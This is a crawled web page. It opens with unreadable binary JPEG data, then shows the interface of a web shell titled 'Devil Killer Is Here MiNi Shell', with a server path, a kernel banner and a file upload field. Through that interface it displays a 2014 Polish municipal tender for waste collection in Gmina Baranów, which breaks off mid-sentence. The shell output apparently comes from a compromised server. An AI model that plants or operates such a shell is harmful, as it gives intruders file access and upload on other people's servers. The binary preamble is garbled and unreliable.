JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140303/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140303/70246-N-2014.html

<p class="kh_header"><b>Baranów: Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Baranów w okresie od dnia 1 kwietnia 2014 roku do dnia 31 grudnia 2016 roku</b><br>
<b>Numer ogłoszenia: 70246 - 2014; data zamieszczenia: 03.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Baranów , ul. Rynek 14, 24-105 Baranów, woj. lubelskie, tel. 81 883 40 27, faks 81 883 40 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> gmina@gminabaranow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Baranów w okresie od dnia 1 kwietnia 2014 roku do dnia 31 grudnia 2016 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Baranów z sołectw: Baranów, Czołna, Dębczyna, Gródek. Huta, Karczunek, Klin, Kozioł, Łukawka, Łukawica, Łysa Góra, Motoga, Niwa, Nowomichowska, Pogonów - Motoga, Składów, Śniadówka, Wola Czołnowska oraz Zagóźdź.
2) Wykonawca zobowiązany jest do odbioru i zagospodarowania od właścicieli nieruchomości z częstotliwością co najmniej raz w miesiącu kalendarzowym, całej masy odpadów komunalnych przekazanych przez właścicieli nieruchomości obejmujących zarówno zmieszane odpady komunalne ( w tym popiół powstały w wyniku spalania paliw stałych w piecach CO) oraz odpady gromadzone w sposób selektywny tj: 
- odpady surowcowe (suche) - makulatura, tworzywa sztuczne, opakowania z metali żelaznych i nieżelaznych, opakowania po kosmetykach, opakowania po chemii gospodarczej,
- szkło białe i kolorowe,
- odpady zielone ulegające biodegradacji

Wykonawca zobowiązany jest zorganizować w miesiącach maj, sierpień i listopad 2014 roku, oraz w miesiącach marzec, czerwiec, wrzesień, grudzień 2015 roku oraz w miesiącach  marzec, czerwiec, wrzesień, grudzień 2016  roku odbiór bezpośrednio z terenu przyległego do nieruchomości, odpadów obejmujących:
- zużyty sprzęt elektroniczny i elektryczny, 
- chemikalia (farby, lakiery, przeterminowane środki ochrony roślin, rozpuszczalniki), 
- lampy fluoroscencyjne, 
- oleje, tłuszcze, 
- tusze, 
-zużyte akumulatory, ogniwa i baterie galwaniczne, 
- opony, 
- meble i odpady wielogabarytowe, 
- odpady budowlane i rozbiórkowe,
- opakowania wielomateriałowe,
- odpady opakowaniowe ulegające biodegradacji;
a) szacunkowa liczba nieruchomości, z których będą odbierane odpady komunalne wynosi 1109 nieruchomości; szacunkowa liczba nieruchomości w poszczególnych sołectwach Gminy Baranów - określona została w Załączniku Nr 7 do SIWZ,
b) szacunkowa ilość zmieszanych odpadów komunalnych, którą Zamawiający przewiduje do odebrania od właścicieli nieruchomości w ciągu okresu trwania zamówienia wynosi: 2000 Mg,
c) szacunkowa ilość selektywnie gromadzonych odpadów komunalnych, którą Zamawiający przewiduje do odebrania od właścicieli nieruchomości w ciągu okresu trwania zamówienia wynosi:
- tworzywa sztuczne: 100 Mg
- szkło: 300 Mg
- makulatura: 150 Mg
- zużyty sprzęt elektroniczny i elektryczny: 20 Mg
- zużyte opony: 60 Mg
- odzież: 5 Mg
- odpady zielone ulegające biodegradacji: 100 Mg
- inne: wg potrzeb
3) Wykonawca zobowiązany jest do odbioru (bezpośrednio z terenu przyległego do nieruchomości) odpadów komunalnych gromadzonych na terenie poszczególnych nieruchomości w pojemnikach o pojemności 0,12 m3 i o większej pojemności (przeznaczonych na gromadzenie odpadów zmieszanych i selektywnych) oraz workach 120 l z folii LDPE przeznaczonych na gromadzenie odpadów w sposób selektywny,
4) Wykonawca zobowiązany jest do wyposażenia raz w miesiącu w dniu odbierania odpadów, właścicieli nieruchomości od których, odbierane są odpady komunalne gromadzone w sposób selektywny w worki 120 l z folii LDPE (3 sztuki - bez względu na rodzaj odebranych odpadów gromadzonych w sposób selektywny) przeznaczone na gromadzenie poszczególnych frakcji odpadów - worki muszą być oznaczone informacją o rodzaju gromadzonych w nich odpadów oraz nazwą, adresem oraz numerem telefonu Wykonawcy,
5) Wykonawca zobowiązany jest odbierać zmieszane odpady komunalne od właścicieli poszczególnych nieruchomości w ilości pojemników wskazanej przez Zamawiającego w odniesieniu do każdej z nieruchomości,
6) każdorazowo przed terminem odbierania odpadów  w poszczególnych sołectwach Gminy Baranów - Zamawiający przekaże w formie elektronicznej na adres poczty elektronicznej Wykonawcy informację o ilości pojemników ze zmieszanymi odpadami komunalnymi odbieranych w ciągu danego miesiąca kalendarzowego,
7) w przypadkach przekazania przez  właściciela nieruchomości większej ilości zmieszanych odpadów komunalnych od aniżeli ilość wskazana przez Zamawiającego, Wykonawca zobowiązany jest do odebrania całej masy zmieszanych odpadów komunalnych oraz  poinformowania Zamawiającego  w ciągu 7 dni kalendarzowych od daty odbioru odpadów o numerze nieruchomości oraz o  masie (liczbie pojemników)   odebranych odpadów zmieszanych ponad ilość, o której mowa w pkt. 6,
8) W przypadku nie poinformowania Zamawiającego o odbiorze dodatkowej masy zmieszanych odpadów - Wykonawcy nie będzie przysługiwać wynagrodzenie za odbiór dodatkowej masy zmieszanych odpadów komunalnych.
9) Wykonawca zobowiązany jest do odbierania odpadów z poszczególnych nieruchomości w ustalonych w harmonogramie usuwania odpadów komunalnych (stanowiącym załącznik Nr 8 do SIWZ) terminach niezależnie od warunków atmosferycznych, pojazdami  przystosowanymi do odbioru poszczególnych frakcji odpadów oraz w sposób wykluczający mieszanie odpadów segregowanych. z zastrzeżeniem, że odbiór w/w odpadów musi odbywać się w dni robocze w godzinach od 7.00 do 17.00,
10) Wykonawca na żądanie Zamawiającego nieodpłatnie wyposaży wskazane nieruchomości w pojemniki o pojemności większej niż 0,12 m3,  przeznaczone na gromadzenie odpadów zmieszanych i selektywnych (szkło, tworzywa sztuczne, makulatura oraz odpady biodegradowalne) - orientacyjna liczba pojemników - 20 szt.
11) w przypadku wyposażenia wskazanych nieruchomości w pojemniki, o których mowa w pkt 10 - Wykonawca zobowiązuje się do odbierania gromadzonych w nich odpadów komunalnych w terminie dwóch dni roboczych, po uprzednim telefonicznym lub za pomocą poczty elektronicznej zgłoszeniu przez Zamawiającego potrzeby odebrania odpadów,
12) wykonawca zobowiązany jest również do odbioru i zagospodarowania powstających w gospodarstwach domowych odpadów obejmujących zużyty sprzęt elektroniczny i elektryczny, chemikalia (farby, lakiery, przeterminowane środki ochrony roślin, rozpuszczalniki ), lampy fluoroscencyjne, oleje, tłuszcze, tusze, zużyte akumulatory, ogniwa i baterie galwaniczne, metale, opony, meble i odpady wielogabarytowe, odpady budowlane i rozbiórkowe, opakowania wielomateriałowe oraz odpady opakowaniowe ulegające biodegradacji  z Punktu Selektywnego Zbierania Odpadów Komunalnych usytuowanego w Baranowie przy ul. Cmentarnej. Wykonawca zobowiązany jest   do odbioru w terminie  dwóch dni roboczych, po uprzednim telefonicznym lub za pomocą poczty elektronicznej zgłoszeniu przez Zamawiającego potrzeby odebrania odpadów,
13) Wykonawca zobowiązany jest do odbierania odpadów w sposób zapewniający utrzymanie odpowiedniego stanu sanitarnego, w szczególności zapobiegania wysypywaniu się odpadów z pojemników i worków podczas dokonywania odbioru oraz każdorazowego uprzątnięcia terenu wokół odbieranych pojemników z odpadami komunalnymi, jeżeli zanieczyszczenie terenu powstało w wyniku działania Wykonawcy,
14) Jeżeli w toku realizacji zamówienia nastąpi uszkodzenie lub zniszczenie pojemnika wynikłe z winy Wykonawcy, jego naprawienie i doprowadzenie do stanu poprzedniego należy do Wykonawcy.
15) Wykonawca winien zapewnić kontakt telefoniczny co najmniej w godzinach 7.00 - 17.00 celem nadzorowania przez Zamawiającego odbierania odpadów,
16) W przypadku stwierdzenia niewłaściwej segregacji Wykonawca przyjmuje te odpady komunalne jako  odpady zmieszane. Przed zakwalifikowaniem odpadów selektywnych do zmieszanych w wypadku niedopełnienia przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpadów komunalnych, Wykonawca sporządzi na tą okoliczność dokumentację np. oświadczenie, dokumentację fotograficzną i przekaże ją Zamawiającemu,
17) Wykonawca zobowiązany jest  przez cały okres obowiązywania umowy dysponować pojazdami w niezbędnej ilości do prawidłowej realizacji przedmiotu umowy, przystosowanymi do odbioru poszczególnych typów odpadów, w sposób wykluczający mieszania się odpadów, w szczególności winien dysponować pojazdami specjalistycznymi przystosowanymi do odbioru zmieszanych odpadów komunalnych, odpadów zebranych selektywnie oraz pozostałych odpadów określonych w opisie przedmiotu zamówienia,
18) Wykonawca zobowiązany jest do przekazywania odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do Regionalnej Instalacji do Przetwarzania Odpadów Komunalnych, przewidzianej do obsługi Gminy Baranów zgodnie z Planem Gospodarki Odpadami dla Województwa Lubelskiego.  Przekazanie odpadów należy udokumentować Zamawiającemu w okresach miesięcznych Kartę przekazania odpadów  należy przedłożyć zamawiającemu do 10 dnia miesiąca następującego po miesiącu, w którym były przekazywane odpady komunalne w formie kserokopii potwierdzonej za zgodność z oryginałem.
19) Wykonawca zobowiązany jest do przekazywania odebranych od właścicieli nieruchomości selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami  - ustawa  z dnia 14 grudnia 2012 r. o odpadach ( Dz. U. z 2013 r. poz.21 ze zm.). Przekazanie odpadów należy udokumentować Zamawiającemu w okresach miesięcznych Kartę przekazania odpadów  należy przedłożyć zamawiającemu do 10 dnia miesiąca następującego po miesiącu, w którym były przekazywane odpady komunalne w formie kserokopii potwierdzonej za zgodność z oryginałem.
20) Wykonawca zobowiązany jest przekazywać Zamawiającemu raz w miesiącu, w terminie  do 10 dnia miesiąca następującego po miesiącu, którego dotyczy raport -  raportu z monitoringu bazującego na systemie pozycjonowania satelitarnego,  który należy zamontować w każdym pojeździe, dokumentujący przebieg pracy pojazdu.
21) Wykonawca zobowiązany jest do prowadzenia ewidencji przekazanych odpadów zgodnie z obowiązującymi przepisami oraz  przedkładania ich Zamawiającemu, 
22) Wykonawca ma obowiązek zagospodarować odebrane odpady komunalne w sposób zapewniający osiągnięcie określonych poziomów recyklingu, przygotowania  do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z zapisami ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (Dz. U. z 2013 r. poz. 1399 ze zm.) i rozporządzeniami wykonawczymi do tej ustawy,
23) Wykonawca ponosi całkowitą odpowiedzialność za prawidłowe gospodarowanie odebranymi odpadami zgodnie  z przepisami obowiązującymi w tym zakresie. Dotyczy to ewentualnego przeładunku odpadów, ich transportu, spraw formalno -  prawnych związanych   z odbieraniem i dostarczeniem odpadów uprawnionemu przedsiębiorcy prowadzącemu działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych. 
24) Wykonawca jest zobowiązany do sporządzania kwartalnych sprawozdań                                  i przekazywania ich Zamawiającemu w terminie do końca miesiąca następującego po kwartale, którego dotyczy, zgodnie z ustawą o utrzymaniu czystości i porządku w gminach (Dz. U. z 2013 r. poz. 1399 ze zm.) oraz wykonywanie  innych obowiązków wynikających z aktualnie obowiązujących ustaw i rozporządzeń w zakresie gospodarowania odpadami.
25) Wykonawca zobowiązuje się do przekazywania Zamawiającemu  kart przekazania odpadów do miejsca ich odzysku, recyklingu lub unieszkodliwienia w terminie do ostatniego dnia każdego kwartału,
26) Wykonawca w miesiącu kwietniu 2014 (oraz jeżeli będą gromadzone - w kolejnych miesiącach) roku odbierze selektywnie gromadzone odpady komunalne w workach, w które wyposażył właścicieli nieruchomości podmiot odbierający odpady komunalne do końca marca 2014 roku,
27) Wykonawca zobowiązany do utrzymywania odpowiedniego standardu sanitarnego wykonywanych usług oraz ochrony środowiska określonymi w odrębnych przepisach wydanych na podstawie art. 9d ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (Dz. U. z 2013 r., poz. 1399 ze zm.),
28) Wykonawca zobowiązany jest do spełniania wymagań stawianych przedsiębiorcom odbierającym odpady komunalne określonych na podstawie art. ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (Dz. U. z 2013 r., poz. 1399 ze zm.) oraz rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości ( Dz. U.  z 2013 r. poz. 122).
Warunki i forma płatności za przedmiot zamówienia: przelew na podstawie wystawionej faktury VAT obejmującej łączną masę odpadów zmieszanych odebranych w ciągu każdego kwartału kalendarzowego, płatny w ciągu 30 dni od daty wystawienia faktury z załączonymi kartami przekazania odpadów do miejsca ich odzysku, recyklingu lub unieszkodliwienia i sprawozdaniem kwartalnym.

UWAGA!
Wykonawcy nie będzie przysługiwać wynagrodzenie za odbiór odpadów innych niż zmieszane..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie uzupełniające może dotyczyć rozszerzenia zakresu świadczonych usług - odbioru większej masy zmieszanych i selektywnie gromadzonych odpadów komunalnych, aniżeli przewidywana przez Zamawiającego do odebrania masa odpadów określona do SIWZ. Wartość zamówień uzupełniających nie może przekroczyć 50 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-5, 90.51.20.00-9, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości: w wysokości 15 000,00 zł (słownie: piętnaście tysięcy złotych). 2. Wykonawca może wnieść wadium w jednej lub kilku formach w art. 45 ust. 2 ustawy Pzp, tj.: 1) w pieniądzu; 2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 3) w gwarancjach bankowych; 4) gwarancjach ubezpieczeniowych; 5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 42, poz. 275 oraz z 2007 r. z e zmianami). 3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. 4. Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego w Nadwiślańskim Banku Spółdzielczym w Puławach Nr 30 8736 0006 2004 0081 6975 0003 z dopiskiem wadium - postępowanie przetargowe: WADIUM - PRZETARG - ODBIERANIE ODPADÓW KOMUNALNYCH 2014 - 2016 5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku zamawiającego. 6. W przypadku wniesienia wadium formie innej niż w pieniądzu - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego - Urząd Gminy Baranów - sekretariat. a kserokopię dokumentu poświadczoną za zgodność z oryginałem należy dołączyć do oferty. 7. W przypadku składania oferty wspólnej, wadium wniesione przez jednego ze wspólników uważa się za wniesione prawidłowo. 8. Brak wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt. 2 9. Zwrotu i zatrzymania złożonego wadium przetargowego zamawiający dokona zgodnie z przepisami art. 46 ust. 1-5 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania tego warunku Wykonawca zobowiązany jest przedłożyć: 1) wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości prowadzonego przez Wójta Gminy Baranów, 2) zezwolenie na transport odpadów stanowiących przedmiot zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Informacja o części zamówienia, której wykonanie Wykonawca zamierza powierzyć do wykonania podwykonawcy (wg załącznika nr 5 do SIWZ). Uwaga! Umowa o podwykonawstwo musi mieć zapisy zgodne ze sposobem realizacji przedmiotu zamówienia określonym w niniejszej SIWZ, w przeciwnym razie zamawiający zgłosi zastrzeżenia lub sprzeciw. Pisemne zobowiązanie (lub inny dokument) podmiotów opisanych w pkt. V.3 SIWZ do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - o ile dotyczy. Dokumenty dotyczące tzw. podmiotów zagranicznych opisane w pkt. VI.3 SIWZ - o ile dotyczy. Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 23 ustawy Prawo zamówień publicznych (dotyczy również wspólników spółki cywilnej). Treść pełnomocnictwa musi rozstrzygać, czy ustanowiony pełnomocnik jest uprawniony do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia publicznego, czy również do zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna także identyfikować wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia, jak również wskazywać ustanowionego pełnomocnika. Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumenty składające się na ofertę podpisuje osoba nieuprawniona do reprezentowania wykonawcy (zgodnie z odpisem z Krajowego Rejestru Sądowego lub z zaświadczeniem o wpisie do ewidencji działalności gospodarczej). Pełnomocnictwa, o których mowa powyżej powinny być przedstawione w formie oryginału lub poświadczonej za zgodność z oryginałem kopii przez osoby wystawiające pełnomocnictwo, notariusza lub osoby, których uprawnienie do reprezentacji wynika z dokumentu rejestracyjnego (ewidencyjnego) wykonawcy, zgodnie ze sposobem reprezentacji określonym w 